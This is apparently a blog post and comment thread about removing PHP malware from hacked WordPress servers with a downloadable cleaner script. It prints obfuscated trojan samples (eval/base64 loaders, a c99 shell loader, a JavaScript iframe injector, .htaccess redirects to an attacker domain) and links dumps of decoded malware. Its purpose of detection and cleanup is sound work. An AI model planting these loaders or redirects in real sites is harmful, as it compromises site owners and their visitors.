Our server was hacked, and all PHP files were infected. The infected PHP file was injected with a malicious code / malware, see below, the code calls another PHP file and run it’s program. In order, to clean the files I need to removed the malware or malicious codes on each files. It is really frustrating if you have hundreds of infected files. so, what I did is, I created a script that will do that automatically.
List of Malicious Code / Malware Script that I have encountered so far:
A. c99madshell – this type of malware script has the ability to view your database and access your files, just like an admin. Below is the sample code:
<?php $md5 = "2b351068f6742153073f3af2e7fa11de"; $wp_salt = array('6',"r",')',"f",'i','4',"z",'_','(','e',";","g","o",'b',"a","$","v","d","t",'n','c',"l","s"); $wp_add_filter = create_function('$'.'v',$wp_salt[9].$wp_salt[16].$wp_salt[14].$wp_salt[21].$wp_salt[8].$wp_salt[11].$wp_salt[6].$wp_salt[4].$wp_salt[19].$wp_salt[3].$wp_salt[21].$wp_salt[14].$wp_salt[18].$wp_salt[9].$wp_salt[8].$wp_salt[13].$wp_salt[14].$wp_salt[22].$wp_salt[9].$wp_salt[0].$wp_salt[5].$wp_salt[7].$wp_salt[17].$wp_salt[9].$wp_salt[20].$wp_salt[12].$wp_salt[17].$wp_salt[9].$wp_salt[8].$wp_salt[15].$wp_salt[16].$wp_salt[2].$wp_salt[2].$wp_salt[2].$wp_salt[10]); $wp_add_filter('FZnHEqvGFkU/x3YxIKdyeUDOGZEmr8gZRA5f/3SH0gS6+/...'); ?>B. Trojan
<?php ... eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJj...")); ...C. Trojan
<?php if(!function_exists('b4xvpqj38lpm8ux')){function b4xvpqj38lpm8ux($almi){$ddhg='mi=';$obwyp2='ba';$tqmtyx='$a';$dl8u6='4';$ufhk7=';';$fead2i='l';$jqml='e';$gndg='c';$c8px1='al';$fnidfi='ode';$u5vntk='se6';$uhoe='($';$wucoiz='_d';$ebexu='mi)';eval($tqmtyx.$fead2i.$ddhg.$obwyp2.$u5vntk.$dl8u6.$wucoiz.$jqml.$gndg.$fnidfi.$uhoe.$c8px1.$ebexu.$ufhk7);return $almi;}$dn4b2l='DTh0aDxGZzVodDE1Zzx4T19SQ1NfbEFKUnIrSjpxeGpqM2c1aHQxNTx4T19SQ1NfbEFKUnIrSjpxeDRuajt0MXRSWjVpPHhndFoySW0+UjVNTUtNWng0Tmo7NU1NS01STTUyS01pdDFkPE5qO2c1aHQxNTx4T19SU2JsOjBKUio6X0NsRzB4NHhNNWFLaTVSWndNdDJpUmFtd254ajtnNWh0MTU8eE9fUitDOlJTUFNEOlJDU19sQUp4NGlNLTVqO2c1aHQxNTx4T19SU1BTRDpSQ1NfbEFKUkpscjp4NFdOVldOVm5wajtnNWh0MTU8eE9fUitDOlJTUFNEOlJDOl8qOl9sQXg0aU0tNWo7ZzVodDE1PHhPX1JTUFNEOlJDOl8qOl9sQVJKbHI6eDRXTlZXTlZucGo7aC0xd2l0SzF8T19Scm1kdHdDaU10MlpJbVpmNVo8JG1NTWozdGg8dFpSbU1NbT48JG1NTWpqMyRtTU05bU1NbT5SYW0yPCdPX1JybWR0d0NpTXQyWkltWmY1Wic0JG1NTWo7QjVJWjUzJG1NTTlaaU10MlpJbVpmNVo8JG1NTWo7Qk01aS1NMXwkbU1NO0JoLTF3aXRLMXxPX1JsMXRpPGozZzV...';eval(b4xvpqj38lpm8ux('JGRuNGIybD1iNHh2cHFqMzhscG04dXgoJGRuNGIybCk7JGRuNGIybD1zdHJ0cigkZG40YjJsLCdnKzQhdk9WdS9OYnc5V0Ege0hCNUU4PmpJaHRxb01zeENUbllfYXBRKDwuMm1SNzFKUyJacktYaWZsKXkKOmV9RDN8UDY9Y0wway0qR3pGLFVkJywn...'));}D. Javascript Trojan
<script>if(window.document)aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';try{new location(12);}catch(qqq){...}ee='e';e=window.eval;t='y';}h=-4*Math.tan(Math.atan(0.5));n="3.5a3.5a51.5a50a15a19a49a54...".split("a");for(i=0;i-n.lengthE. htaccess – The code below redirects your visitors to the hackers site (massage-pool.ru)
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L] </IfModule> ErrorDocument 400 http://massage-pool.ru/mysave/index.php ErrorDocument 401 http://massage-pool.ru/mysave/index.php ErrorDocument 403 http://massage-pool.ru/mysave/index.php ErrorDocument 404 http://massage-pool.ru/mysave/index.php ErrorDocument 500 http://massage-pool.ru/mysave/index.phpF. Timthumb Vulnerability
This script basically use to crop and resize images, it used in most WP Premium themes, but hackers were able to find the vulnerability of this script and was able to do whatever they want, unfortunately, with the help of this script they can access your database to get important information, insert malicious codes in all of your php files, and even create another malicious php script, and can do a lot more.
Any timthumb.php or thumb.php file that is below 1.35 version is vulnerable I advice to update the file to 2.0 and up version.
Solution: Update your file here: http://timthumb.googlecode.com/svn/trunk/timthumb.php
G. class-wheel.php
As far as I decoded the file, the script sends important information of your server to thebestcache.com and then the script gets data from that server and then execute it. I think with this script the hacker can do whatever they want to do to your server just like on timthumb such as writes RewriteRule on your htaccess to redirect user to his/hackers site, insert malicious iframes, insert malicious javascript, and a lot more.
Solution: Delete this file immediately
Below is the snippet code of the script
<? $GLOBALS['_1739858145_']=Array('e' .'rror' .'_' .'r' .'eporting','' .'in' .'i_' .'se' .'t','in' .'i_set','' .'soc' .'k' .'et_' .'get' .'peerna' .'m' .'e','s' .'trto' .'k','strpbrk','session_' .'i' .'s_reg' .'ist' .'ered','preg_replace','ima' .'gecre' .'at' .'efro' .'mg' .'i' .'f','ar' .'ray_pop','implode','preg_mat' .'ch','i' .'m' .'pl' .'ode','preg_ma' .'t' .'ch','str' .'ripos','fl' .'o' .'ck','array_f' .'lip','mt_rand','p' .'reg_' .'match','p' .'reg_mat' .'ch','im' .'pl' .'o' .'de','p' .'reg_' .'m' .'a' .'tch','' .'b' .'as' .'e64_encode','ser' .'ialize','fi' .'l' .'e' .'_get' .'_c' .'ontents','b' .'ase64_d' .'ecode','preg_m' .'atch','' .'pre' .'g_rep' .'la' .'ce','' .'preg_replace','u' .'nse' .'ri' .'alize','base64' .'_d' .'e' ...H. god_mode_on
<?php /*god_mode_on*/eval(base64_decode("ZXZhbChiYXNl...")); /*god_mode_off*/ ?><?php /*f2c315e178b39d12fa925987425e4e25_on*/ $Py0IAoRh= array('10100','10117','10096','10107');$VMteSwXRc7lP= array('4892','4907','4894','4890','4909','4894','4888','4895','4910','4903','4892','4909','4898','4904','4903');$xvak07gN5kcVT= array('6294','6293','6311','6297','6250','6248','6291','6296','6297','6295','6307','6296','6297');$YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTm...";if (!function_exists("TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5")){ function TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16,$bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg = '';foreach($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16 as $QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg .= chr($QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH - $bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr);}return $Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg;}$zs4ALsgC4dMC1kTLd = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($Py0IAoRh,9999);$G2dp21boYT5TLmcF = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($VMteSwXRc7lP,4793);$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($xvak07gN5kcVT,6196);$eozu2spipON = $G2dp21boYT5TLmcF('$MxYAjVJONC',$zs4ALsgC4dMC1kTLd.'('.$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB.'($MxYAjVJONC));');$eozu2spipON($YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X);} /*f2c315e178b39d12fa925987425e4e25_off*/ ?>I. Trojan
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1Uj...";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\xp76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\xp76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>
Most these attacks happens when you have old version of your programs – WordPress, Joomla, Timthumb, WP Plugins, easy ftp or sftp password, and infected computer can use your ftp as well. Make sure you have an updated version of your programs.
Download and Install
Downloand cleaner script below and put in on your root directory or any directory. This program will check all the PHP files and clean it if it’s infected with Malware code above.
Malware code keeps on coming back
If you remove malware code / malicious script successfully but if it still keeps on coming back. I suggest you to run malware scanner: http://www.php-beginners.com/wordpress-hack-malware-scanner.html and please send the scan result to info@php-beginners.com, we need to find file that causes the malware code / malicious script on coming back.
You can download two types of Cleaner script
Web browser and Shell Access version. You can use any of the two.
- Download Cleaner 2.9 HTTP Version below and run it on your favorite browser.
Example: http://www.yoursite.com/cleaner_2.9.php
- Title : cleaner_2.9
Caption :
File name : cleaner_2.9.zip
Size : 2 kB- Download Cleaner CLI 2.9 Version below and run it using terminal or command line.
Example: $ time php cleaner-cli_2.9.php 2>&1 >> cleaner_log
The command above will run the cleaner-cli_2.9.php script and log the output to cleaner_log file.
- Title : cleaner-cli_2.9
Caption :
File name : cleaner-cli_2.9.zip
Size : 2 kB
Note:
Please don’t forget to create a backup of your wordpress files or /wp-content/ directory only. Use shell access to backup files because it is fast and easy.
You can do it like this: $ tar -cvzf [output_directory.tar.gz] [directory]
[~/wordpress-directory]# tar -cvzf wp-backup-content-only.tar.gz ./wp-content or [~/wordpress-directory]# tar -cvzf wp-backup-all.tar.gz ./
This malware / malicious cleaner script works on all php programs, you can run it even if it’s a non-wordpress sites, but please create a backup of your files before you run the cleaner script, just to make sure you can recover it easily.
If you experienced any malware / malicious program that I don’t know, please let me know so that I can add it on the program. Thanks.
Malware Cleaner
Really great creation for WordPress Malware Script Attack Fix.
Wow amazing nice! it worked!
Hi, does anyone know specifically what flaw created this issue? Was it definitely Word Press, if so does anyone have a permanent fix? Also, does anyone know what this script specifically does aside from injecting the malicious code in other script. To me, it appears it also captures credentials and/or attempts other hacks. I haven’t looked at all the code, but I’m hoping someone as more information on this.
The script works by recursively evaluating a piece of code that it is encoded & inflated. For assistance, I’ve created a helper function which, when given the string passed to wp_add_filter, will decode the string and display the final readable php that is ultimately evaluated:
function resolve($str) { while(true) { $str = gzinflate(base64_decode($str)); if(substr($str, 0, 4) != "eval") break; print $str; print ""; $pos = strpos($str, "'")+1; $rpos = strrpos($str, "'"); $str = substr($str, $pos, $rpos - $pos); } print $str; }As the author stated, the above runs another php script hidden in a random folder, which is much larger and includes most of the malicious code that not only injects itself to other scripts but appears to collect credentials, access other urls, run brute force, etc. I’ve not analyzed this larger code, but if someone has additional information, it would be helpful to prevent in the future.
Thanks!
Hello Graeme,
You can try this script to decrypt the code:
<?php header("Content-type:text/plain"); $malwareCode = gzinflate(base64_decode("FZnFDuvWAkU/p608MJOqDs..........................")); function malDecrypt($m){ if(preg_match("/^eval\(gzinflate/", $m)){ eval(str_replace("eval", "\$m=", $m)); return malDecrypt($m); }else return $m; } echo malDecrypt($malwareCode);Run this with your $malwareCode, make sure you replace the malware code. With my situatio,n the malware scripts looks like this:
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){ $GLOBALS['mfsn']='/home3/hmjohnco/public_html/whatscrapandwhatsnot/cgi-bin/255.php'; if(file_exists($GLOBALS['mfsn'])){ include_once($GLOBALS['mfsn']); if(function_exists('gml')&&function_exists('dgobh')){ ob_start('dgobh'); } } }I didn’t really get into the details of the code. What I did, is I deleted the file he is calling. If you have enough time you can try to decrypt file and share us what you’ve found. I think it’s interesting.
I think the attack happened because we are using shared server. I don’t think it’s in wordpress, but I’m not really sure about that.
This hackers are really good because sometimes I’m having a hard time entering the ftp because I forgot my password but they (hackers) can easily go in and inject all those files. Amazing.
Anyway, thanks for sharing Graeme. Hope they’ll stop bugging us, because they really cost a lot of time.
Thanks Graeme
Many thanks guys!!! My site got infected today and I was able to fix the mess using your cleaner.php file (for which you’ll immediately receive a post in my blog – that’s the least I can do…). I think they’ve got through a WordPress vulnerability. What the virus appears to be doing is add spam links to the body of your pages. It seems it’s not doing anything else than that, although I wasn’t able to decrypt it all, so this is as far as I got… It’s still a mystery to me how they got in though, so even with the virus currently removed, I’m afraid it may happen again… Any advice?
Thank you Marin for sharing.
That’s the usual malware does, it inserts bunch of codes, spam links, iframes, on your home page and subpages. Yeah! it’s still mystery, only the masters know. Actually, I’d like to know that too (on how to hack), so that I can defend my server somehow. But anyways, thanks Marin for your feedback, I’m happy that my little script help you on your malware issue.
If you guys have any problem on different malware attack, let me know. I’ll try to update my cleaner.php script so that it can clean other malware attacks, or if you have time you can modify it and improve. Thanks.
At this point, I have the virus decrypted (about 4000 lines of code) Anyone willing to help with this? (reading and understanding it)
My advice so far is, disable the following functions from your php.ini:
disable_functions = create_function,gzinflate,eval,base64_decode
That’s good… hmmmm… Can I view it? Just give me a link.
I’m not really sure on disabling
gzinflate,eval, and speciallybase64_decodeis a good idea.Hope you don’t consider this as spam, but here’s all the info: http://www.marinbezhanov.com/web-development/6/malware-alert-september-2011-sshell-v.1.0/
seems a really 0day VIrus…
there is no forums or mailiing list about this virus
yes, what would be the countermeasures for this new virus/malware ?
disabling those functions that Marin mentioned wouldnt be good because Word press uses those functions i believe….
Regards,
You’re right Poncho. WordPress uses all of these functions… I’m wondering if someone on the WordPress support forum will have any further ideas on this. Although I decoded 3 of the virus files I found, I’m almost sure I’m missing something… Has someone had a chance to look at the code I decrypted? Any luck in understanding it fully? I’m pasting the links here quickly, so that you don’t have to read the whole article on my blog:
Malicious Code injected in every PHP file: http://pastebin.com/Wv9eqi7J (where “/home/marinbez/public_html/mediashare/cgi-bin/1bf.php” is the path to an include file containing more malicious code)
1bf.php’s code (the filename is randomly generated): http://pastebin.com/SGJ74C6Y
wp-thumb-creator.php’s code: http://pastebin.com/9gP3vgyH (looks like that’s one of the main virus files, but not the only one. it’s the one responsible for the PHP injection)
SSHell v.1.0′s code: http://pastebin.com/1qS8CyCF (that shell file is usually located in the same folder as the others. it’s the file that allows the hackers to log into your server and cause trouble. I’ve intentionally commented out the authentication, so that you can see how it works, without having to type password)
Yes, Marin is correct
wp-thumb-creator.php( http://pastebin.com/9gP3vgyH ) is the one that injects malicious code all php files. This is also the main file of the hacker.Thank you Marin for pointing it out.
couple days without sleeping…was reinstalling all wp blogs, was thinking what to do and here it is, simple script ,that cleans these virus
I would like to ask how much of blogs it can scan ? because when I’m starting it, it stops after some time.
I fixed that problem by adding
ini_set(‘memory_limit’,’128M’);
Oh! Yeah! exactly you will specify the memory limit.
Sorry about that, I forgot to add that to the code. Thanks for letting me know about it. If possible, use the “
cleaner-cli.php” run it on command-line so you won’t have problem on setting up memory limit.Basically, the script scans all PHP files – including sub-directories PHP files, so, if you’re going to put the “
cleaner-cli.php” on your root directory, it eventually clean everything – all PHP files until to Nth sub-directory.I also suggest to run Malware Scanner ( http://www.php-beginners.com/wordpress-hack-malware-scanner.html ) that I recently created. You can view other potential hacking codes, such as,
eval, c99madshell, and long_text. Again, I suggest to run it on command line. I might create an ajax version someday for cleaner and scanner script. So, it won’t take much of memory. I’ll just keep you all posted.Anyway, if you found bugs and errors, please do let me know. Thanks.
strange, but it not founding md5 code at subdomain blogs.
Can I see your file structure? It should be like this one:
Cleaner will try open all the sub-directories and check all PHP files.
The issue has been recently reported on the WordPress forums: http://wordpress.org/support/topic/warning-tinymce-exploit
Wow this is really helpful. Thanks again! Marin. Great job.
My site’s also been infected. I’m on a shared server and don’t have command-line access, so I uploaded cleaner.php to the root directory and ran it from a browser.
cleaner.php’s output was a nested list of files and directories with this line above it
Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode in /var/www/vhosts/else.dnserver.net.nz/httpdocs/cleaner.php on line 2and the heading
Found Filesat the bottom.Do I need to do anything further with this output or has cleaner.php fully resolved everything?
After running cleaner.php I manually deleted the two obviously bogus files fingered by the anti-virus application as they weren’t listed in the above report.
Thanks,
::Leigh
Hello Leigh,
Sorry for the late reply. I hope you already fixed your site, in case if not I created cleaner version 2. You can download it above (post).
Please let me know if there still a problem. I’ll be happy to help you.
Thanks
Regards,
Paolo
Thank you for your great work! It helped me to fix that problem!
Hello admin,
my site attracted with new Malware… but you current script not work bcz there command line is new… which is not found in my php…
every php file include in header this command line
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3Rya…"));can you tell me how to resolved it?
Thanks advance
i have just change your $find code with bellow line
$find =”\s*eval\s*\([^\)]+\)\)\;”;
then run this script…
wow it’s work with me… but i am afraid bcz i’m not good in php… so @Paolo if you make sure in this code no wrong then it would be greats… waiting for your replay…
Thanks for create great scripts…
Hi Ishtiyak,
Nice, yes, the script is pretty clean and safe, there’s nothing wrong about it.
I’m not really sure why you’d replaced the $find value with “…eval\s*…” that means
you’ll remove all “eval(.*)” functions in your php files?
If that’s safe with your program, then we don’t have problem.
Oh! Sorry I didn’t noticed this first comment.
You can try this one:
$find = “<\?php\s*eval\(\s*base64_decode\s*\(.*\)\s*);”;
Test this one first on single file then run it on all of your
files if it’s working fine. See structure below, on how to test on
one file:
/www/…/test/cleaner_2.0.php
/www/…/test/infected-php-file.php
Let me know.
Thanks so much for you reply…
this code not work with me
$find = “<\?php\s*eval\(\s*base64_decode\s*\(.*\)\s*);”;
error this
Warning: preg_match() [function.preg-match]: Compilation failed: unmatched parentheses at offset 43 in /***/**/cleaner2.php on line 161
if at first we target '<?php eval' is it replace all '<?php' where it has 'eval' right?
why i asking about <?php replacing bcz it infected like this type…
<div id=”post-”>
it’s effected on every php starting code… also 2 tab 1 space then start eval()… so if php remove the whole site not working….
I know it pretty danger for bcz i target all eval() function… but when i try to add base64_decode() for safety then it same error show…
P.S: $find =”\s*eval\s*\([^\)]+\)\)\;”; this pretty danger code works with my all site… (joomla, wordress, magento+custom php) now they are fresh… bcz till now not error show on site…
Thanks
Hi,
I am having the same exact problem as the poster above me with this code being injected to thousands of my files:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29..."));Would you mind possible updating your cleaner tool for fixing this malware code? Or tell me how I can update the one you posted above so that it works correctly?
THANK YOU so much for your help. I’ve been dealing with this since October and am just getting this close!
Hello Saje,
Ok, can you please send and attach an infected to me at info@php-beginners.com.
I’ll check the file and create a pattern. Thank you.
Paolo
I uploaded new version 2.1. This will now remove eval(base64_decode(*)); code. Please check it out.
Thanks.
First, I would like to thank Pablo, your cleaner.php script corrected most of the php files.
But I still have quite a few php files that have this kind of code –
<?php
if(!function_exists('.......................'))...
Is there any fix for that?
Thank You.
I forgot to mention that inside that code there are also a few –
eval(........random characters)..
Thanks.
Hello David,
I see, can you please send and attach 3 infected php files to info@php-beginners.com.
I’ll try to check the pattern and create a regular expression of it.
Let me know. Thanks.
Paolo
Hi David,
Can you try my scanner.
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
and send the logs to me as well, it will scan possible hack script
in your server. Thank you.
Paolo
Hi David,
I already checked the files you sent me. It’s a spamming script.
I updated my version to 2.3. You can download and run the script.
Please mind backing up your files first, then run the cleaner script, and then backup again.
Please let me know how it goes.
Paolo
As this article indicates, Malware is a major problem. Stopbadware.org reports that there are over 800,000 sites that are suffering from malware today. The process described above can be a very good set of tools to remove malware from your site, but in my experience it can come in many different and continuously innovative ways.
So if the process seems to get to difficult, or if you have gotten infected multiple times I can probably help.
I have worked to help numerous clients recover their sites, as well as monitor their sites to prevent future attacks and downtime because of being marked as infested by google and other services.
You can check out some of my WordPress Security and Malware Recovery Services.
Paolo,
You saved my life with this script. Your script worked perfectly! Thank you so very much. I would love to buy you a meal if you have a way I could get you some money.
Do you have any suggestions on how to stop this from happening again? All of the infected files have been removed and I’ve updated everything I can. Changed all passwords. Everything is working perfectly, Any other suggestions?
Thanks again.
Hi Mike,
You’re welcome, I’m happy that my script helped you with those malware issue.
My suggestion after cleaning up, if possible change the username/password of your
ftp, db, wp login access, and etc… Create a backup as well.
Make sure your plugins, themes, and wordpress are on updated version, because this is
where they start hacking.
You can also read on this page:
http://wordpress.org/tags/vulnerability
It will tell you informations about wordpress vulnerability.
Thanks again for the comment Mike. Hope you’ll have a great day!
Paolo
Your cleaning scripts saved my life. Thank you so much!!!
Hi Paola, thanks for your help..it’s really helpful…
but after cleaning done, my website unable to load and has a error message like this:
“Parse error: syntax error, unexpected ‘}’ in /… “
could you help me what’s the problem..?
Thank you very much
Hello Wahyu,
Sorry for the late reply. I was so sick, the Doctor advised me to take a break.
Did you create a backup before you run the cleaner script?
What is your site?
Let me know. Thanks.
Paolo
thanks for your script!!
Brilliant – thanks so much. Nice to know there are some good guys out there!
Thank you so much for this script! Nightmare situation turned into easy resolution!
hi there,
can the script remove this kind of malware, mainly infected on index.php but i have alot of index.php files in various folders,
if(window.document)aa='0';aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new document();}catch(qqq){...}ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n=[3.5,3.5,51.5,50,15,19,49,54...];for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f](-h*(1+n[j]));}q=ss;e(q);Hello Jokomana,
Unfortunately, It doesn’t remove this kind of malware but I can create a pattern of it. Just send me email with 3 infected files to info@php-beginners.com.
Thanks.
Paolo
Hi Jokomama,
I have checked your sites. You have a trojan script on your site.
I have updated my cleaner to 2.4 version. You can download and test running it. Please do create a backup first before you run it.
Let me know. Thanks.
Paolo
Hi, i am going to test run it. Do you have any idea how does this trojan virus works? how does it infect my sites, i am using shared hosting.
This creates an iframe with src’s pointing to: (sites)
http:// qzoxmylu.ddns.mobi/stds/go.php?sid=1
http:// ssnybaqn.dns1.us/stds/go.php?sid=1
Careful, site might be infected. Don’t open it.
Hi,
Script works perfectly. However, it appears again, do you think my host is infected?
Thank you very much
You have to get rid the main malware file – it is the one who injects the file. Finding that file
is difficult.
Here’s you’re going to do. Create a backup of your current wordpress files and database.
1. Run Malware Scanner: http://www.php-beginners.com/wordpress-hack-malware-scanner.html
Send the scan result to info@php-beginners.com
2. Run Malware Cleaner 2.4
3. Update your wordpress
4. Update your themes
5. Update your plugins
Paolo
Thank you buddy, emailed you
Hi Paolo,
I found this hack today, please can you help me?
Thank you.
